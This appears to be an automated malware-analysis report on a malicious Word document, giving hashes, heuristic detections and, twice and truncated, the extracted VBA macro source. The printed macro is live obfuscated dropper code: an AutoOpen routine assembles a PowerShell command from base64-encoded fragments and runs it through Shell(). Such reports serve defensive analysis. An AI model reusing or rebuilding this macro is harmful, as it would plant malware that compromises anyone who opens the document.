Office (OLE) malware analysis — malicious · b7f938aa35083674

MALICIOUS

Office (OLE)

95.8 KB Created: 2018-06-12 13:41:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: c734da2d1b8af49cb29a93236ae590ab SHA-1: d43264bf200a616ce769010e62bb40ba8cdcc537 SHA-256: b7f938aa350836740c0e76952d93cee15abfe803c9bf907664778019c37552e2

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers a Shell() call, which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6582624-0' further supports its role as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6582651-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6582651-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13342 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13342 bytes
SHA-256: `34efa8f66ede29ae7fc387d783e9dfecdf78c843258b7f23b2622524a8b2bcdb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AitXrChkSw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function VIiCqhHVG() On Error Resume Next Vzqzvw = Tan(28818) uilCj = NJBMCz QrLYG = CDbl(LWpVt) WThCj = QkKZzN irdip = Hex(SUVFG * ChrW(bopDqE + Int(rnNOj * Rnd(14651)) * jmNHr * Log(84347 * XXRisz - auAOa + Fix(51)))) FnbjU = Tan(39840) VNVdzW = Tan(38714) jHOOOj = RXUzE RsNAF = CDbl(QvLjmW) bJCok = fjunm MrBWD = Hex(WPpEV * ChrW(crnDj + Int(abrME * Rnd(87154)) * ijcYU * Log(44270 * bAtsO - HUPGL + Fix(51)))) ouLti = Tan(53881) VIiCqhHVG = FfznCkQc + Shell(zBbwiNf + Chr(sBEWRNtzBv + vbKeyP + RGQlMnfNsOX) + "owers" + EliRH + mUiNHJa + EjqhjW + zoVYabd + iDMhoEEf, 33556 - 33556) ZMKIzn = Tan(16257) VcuqV = Rjcwup MGMkA = CDbl(FUXquw) zrQrt = GRmrV qpXNi = Hex(nmrMGw * ChrW(wGDnz + Int(zuAkZQ * Rnd(71855)) * pjqaO * Log(81625 * KrhHo - GKdklS + Fix(51)))) vzCdo = Tan(11444) End Function Sub Autoopen() On Error Resume Next VpFzz = Tan(95066) wDAmrH = oOVjJ tjXzoz = CDbl(JqjMl) UzVlj = qFIGc uLRGkj = Hex(fPclRF * ChrW(AfjIW + Int(BinCTd * Rnd(72458)) * Slldv * Log(4162 * mACFzP - trODj + Fix(51)))) JLYzjo = Tan(93253) VIiCqhHVG YOnHv = Tan(50610) irIWD = NfiCX vpvoP = CDbl(LNHMlt) FiNlO = EptOAF cKvftz = Hex(QBWda * ChrW(KjNFR + Int(PPzhA * Rnd(88003)) * ESiBa * Log(89852 * iUBRbT - jqELkL + Fix(51)))) oUcowu = Tan(80646) End Sub Attribute VB_Name = "icvmdsthA" Function EliRH() On Error Resume Next wEOMCG = Tan(76304) WQihf = jwWUHi QUrWv = CDbl(NmlbD) hwJqwF = FYTJvi ivRswa = Hex(sfkWq * ChrW(pafko + Int(mwhXIa * Rnd(28681)) * cizKwn * Log(4961 * RUtdca - QZTGwp + Fix(51)))) siVTvu = Tan(365) kQaiPDiDzpR = "HeLL " + "-e IAAuACgAI" + "AAkAGU" + "AbgB" + "WA" + "DoAYwBPAG0A" IRjzs = Tan(19248) aaCEGI = rLzMK zpTQn = CDbl(qOpdsI) tMbtih = iztEuj irJTj = Hex(iaTzTK * ChrW(TTkwJv + Int(PwPRV * Rnd(59078)) * iwvPVD * Log(51312 * XfJIY - SsdaUm + Fix(51)))) POwuz = Tan(24297) PzjcLmv = "UwBwAGUAQwBbADQ" + "ALAAyADYALAAyAD" + "UAXQA" + "tAGoATwBJAG" + "4A" + "JwAnACkAIAAoAG" + "4ARQBXAC0ATw" + "BCAEoAZQBDAHQA" + "IABzAFkAUwB0AE" + "UA" jbswE = Tan(7557) bXizG = LvFnB XwFmr = CDbl(sVSkz) WrTYv = LEUzrV cNRwTI = Hex(tcpKd * ChrW(BzMihr + Int(NbPAn * Rnd(99725)) * czCXF * Log(69577 * OnaWzb - buBJuG + Fix(51)))) NrmRzz = Tan(65151) FjTASWAIXQm = "bQAuAEkATw" + "AuAGMA" + "bwBtAFAA" + "UgBFAHMAUwB" + "JAG8ATgAuAGQA" wQLTp = Tan(64499) ZREtwm = lLiPi hNrsth = CDbl(FQFFm) NpKLf = IfUjFA wDGaj = Hex(OwUkZS * ChrW(HSqJLw + Int(pZUaz * Rnd(6124)) * aFMils * Log(71033 * LwpWVX - sFktE + Fix(51)))) poKXGt = Tan(36496) ZPRPbiTN = "ZQBm" + "AEwAQQB0AE" + "UAcwBU" + "AHIARQBBAG0AKA" + "BbAFMAWQBT" + "AHQAZQBNAC4" ifafH = Tan(78768) HFnapY = sUpdj jPqGww = CDbl(RCGiwR) cSOqN = WlzwTP hwqid = Hex(qrTpT * ChrW(JEZFzJ + Int(XOfZFw * Rnd(29658)) * GvPtn * Log(68206 * DULXAn - SIduJD + Fix(51)))) wjAnrr = Tan(84273) SYKFvzZ = "AaQBvA" + "C4ATQBlAE" + "0AT" + "wBSAHkAUw" + "B0AHIAR" + "QBhA" + "G0" WkkOK = Tan(68971) EwjwRB = tbIow XwKoLV = CDbl(OPFws) Bzanm = rWEjOL dsmYfD = Hex(wiaavC * ChrW(ahorkF + Int(zGSoV * Rnd(21801)) * ZTPwd * Log(48574 * RcqZtz - WXArj + Fix(51)))) RoPpiF = Tan(39606) jkilcpIV = "AXQAgA" + "FsAcwBZA" + "FMAVABFAE0ALgBD" + "AE8ATgB" + "WAEUAUgBUA" + "F0AOgA6AEY" + "AUgBvAG0AYgBhA" + "FMAZQA2ADQAU" + "wB0" lUkJrq = Tan(43415) LiSdz = FzRrI djSwm = CDbl(mlDaR) ENjHG = BGhKM ZFqJi = Hex(XnwGA * ChrW(CnXUE + Int(IkMuZj * Rnd(53570)) * rCpCjS * Log(45619 * XjhdCm - ibzNf + Fix(51)))) TrhCw = Tan(4534) jKDvUjjzarH = "AFIAaQBuAEcA" + "KAA" + "nAFYAWgBC" + "AHIAVAA4AEk" + "AdwBGAEk" JfjGhk = Tan(51042) zuahd = Qrmai hhSbV = CDbl(sXKIAk) wmrza = RLihhX BwCAub = Hex(jubMF * ChrW(krCKpu + Int(QhUZsL * Rnd(58631)) * KwAlE * Log(79522 * uVKNYX - BKitpL + Fix(51)))) IXsnj = Tan(30223) wpDbT = "AYgAvAFMA" + "agA4AHMARwBVA" + "FQAcABJAHMAUwB" + "BAEwAQwB" idIiz = Ta ... (truncated)

SHA-256: 34efa8f66ede29ae7fc387d783e9dfecdf78c843258b7f23b2622524a8b2bcdb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "AitXrChkSw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function VIiCqhHVG()
On Error Resume Next
Vzqzvw = Tan(28818)
uilCj = NJBMCz
QrLYG = CDbl(LWpVt)
WThCj = QkKZzN
irdip = Hex(SUVFG * ChrW(bopDqE + Int(rnNOj * Rnd(14651)) * jmNHr * Log(84347 * XXRisz - auAOa + Fix(51))))
FnbjU = Tan(39840)
VNVdzW = Tan(38714)
jHOOOj = RXUzE
RsNAF = CDbl(QvLjmW)
bJCok = fjunm
MrBWD = Hex(WPpEV * ChrW(crnDj + Int(abrME * Rnd(87154)) * ijcYU * Log(44270 * bAtsO - HUPGL + Fix(51))))
ouLti = Tan(53881)
VIiCqhHVG = FfznCkQc + Shell(zBbwiNf + Chr(sBEWRNtzBv + vbKeyP + RGQlMnfNsOX) + "owers" + EliRH + mUiNHJa + EjqhjW + zoVYabd + iDMhoEEf, 33556 - 33556)
ZMKIzn = Tan(16257)
VcuqV = Rjcwup
MGMkA = CDbl(FUXquw)
zrQrt = GRmrV
qpXNi = Hex(nmrMGw * ChrW(wGDnz + Int(zuAkZQ * Rnd(71855)) * pjqaO * Log(81625 * KrhHo - GKdklS + Fix(51))))
vzCdo = Tan(11444)
End Function
Sub Autoopen()
On Error Resume Next
VpFzz = Tan(95066)
wDAmrH = oOVjJ
tjXzoz = CDbl(JqjMl)
UzVlj = qFIGc
uLRGkj = Hex(fPclRF * ChrW(AfjIW + Int(BinCTd * Rnd(72458)) * Slldv * Log(4162 * mACFzP - trODj + Fix(51))))
JLYzjo = Tan(93253)
VIiCqhHVG
YOnHv = Tan(50610)
irIWD = NfiCX
vpvoP = CDbl(LNHMlt)
FiNlO = EptOAF
cKvftz = Hex(QBWda * ChrW(KjNFR + Int(PPzhA * Rnd(88003)) * ESiBa * Log(89852 * iUBRbT - jqELkL + Fix(51))))
oUcowu = Tan(80646)
End Sub


Attribute VB_Name = "icvmdsthA"
Function EliRH()
On Error Resume Next
wEOMCG = Tan(76304)
WQihf = jwWUHi
QUrWv = CDbl(NmlbD)
hwJqwF = FYTJvi
ivRswa = Hex(sfkWq * ChrW(pafko + Int(mwhXIa * Rnd(28681)) * cizKwn * Log(4961 * RUtdca - QZTGwp + Fix(51))))
siVTvu = Tan(365)
kQaiPDiDzpR = "HeLL " + "-e IAAuACgAI" + "AAkAGU" + "AbgB" + "WA" + "DoAYwBPAG0A"
IRjzs = Tan(19248)
aaCEGI = rLzMK
zpTQn = CDbl(qOpdsI)
tMbtih = iztEuj
irJTj = Hex(iaTzTK * ChrW(TTkwJv + Int(PwPRV * Rnd(59078)) * iwvPVD * Log(51312 * XfJIY - SsdaUm + Fix(51))))
POwuz = Tan(24297)
PzjcLmv = "UwBwAGUAQwBbADQ" + "ALAAyADYALAAyAD" + "UAXQA" + "tAGoATwBJAG" + "4A" + "JwAnACkAIAAoAG" + "4ARQBXAC0ATw" + "BCAEoAZQBDAHQA" + "IABzAFkAUwB0AE" + "UA"
jbswE = Tan(7557)
bXizG = LvFnB
XwFmr = CDbl(sVSkz)
WrTYv = LEUzrV
cNRwTI = Hex(tcpKd * ChrW(BzMihr + Int(NbPAn * Rnd(99725)) * czCXF * Log(69577 * OnaWzb - buBJuG + Fix(51))))
NrmRzz = Tan(65151)
FjTASWAIXQm = "bQAuAEkATw" + "AuAGMA" + "bwBtAFAA" + "UgBFAHMAUwB" + "JAG8ATgAuAGQA"
wQLTp = Tan(64499)
ZREtwm = lLiPi
hNrsth = CDbl(FQFFm)
NpKLf = IfUjFA
wDGaj = Hex(OwUkZS * ChrW(HSqJLw + Int(pZUaz * Rnd(6124)) * aFMils * Log(71033 * LwpWVX - sFktE + Fix(51))))
poKXGt = Tan(36496)
ZPRPbiTN = "ZQBm" + "AEwAQQB0AE" + "UAcwBU" + "AHIARQBBAG0AKA" + "BbAFMAWQBT" + "AHQAZQBNAC4"
ifafH = Tan(78768)
HFnapY = sUpdj
jPqGww = CDbl(RCGiwR)
cSOqN = WlzwTP
hwqid = Hex(qrTpT * ChrW(JEZFzJ + Int(XOfZFw * Rnd(29658)) * GvPtn * Log(68206 * DULXAn - SIduJD + Fix(51))))
wjAnrr = Tan(84273)
SYKFvzZ = "AaQBvA" + "C4ATQBlAE" + "0AT" + "wBSAHkAUw" + "B0AHIAR" + "QBhA" + "G0"
WkkOK = Tan(68971)
EwjwRB = tbIow
XwKoLV = CDbl(OPFws)
Bzanm = rWEjOL
dsmYfD = Hex(wiaavC * ChrW(ahorkF + Int(zGSoV * Rnd(21801)) * ZTPwd * Log(48574 * RcqZtz - WXArj + Fix(51))))
RoPpiF = Tan(39606)
jkilcpIV = "AXQAgA" + "FsAcwBZA" + "FMAVABFAE0ALgBD" + "AE8ATgB" + "WAEUAUgBUA" + "F0AOgA6AEY" + "AUgBvAG0AYgBhA" + "FMAZQA2ADQAU" + "wB0"
lUkJrq = Tan(43415)
LiSdz = FzRrI
djSwm = CDbl(mlDaR)
ENjHG = BGhKM
ZFqJi = Hex(XnwGA * ChrW(CnXUE + Int(IkMuZj * Rnd(53570)) * rCpCjS * Log(45619 * XjhdCm - ibzNf + Fix(51))))
TrhCw = Tan(4534)
jKDvUjjzarH = "AFIAaQBuAEcA" + "KAA" + "nAFYAWgBC" + "AHIAVAA4AEk" + "AdwBGAEk"
JfjGhk = Tan(51042)
zuahd = Qrmai
hhSbV = CDbl(sXKIAk)
wmrza = RLihhX
BwCAub = Hex(jubMF * ChrW(krCKpu + Int(QhUZsL * Rnd(58631)) * KwAlE * Log(79522 * uVKNYX - BKitpL + Fix(51))))
IXsnj = Tan(30223)
wpDbT = "AYgAvAFMA" + "agA4AHMARwBVA" + "FQAcABJAHMAUwB" + "BAEwAQwB"
idIiz = Ta
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.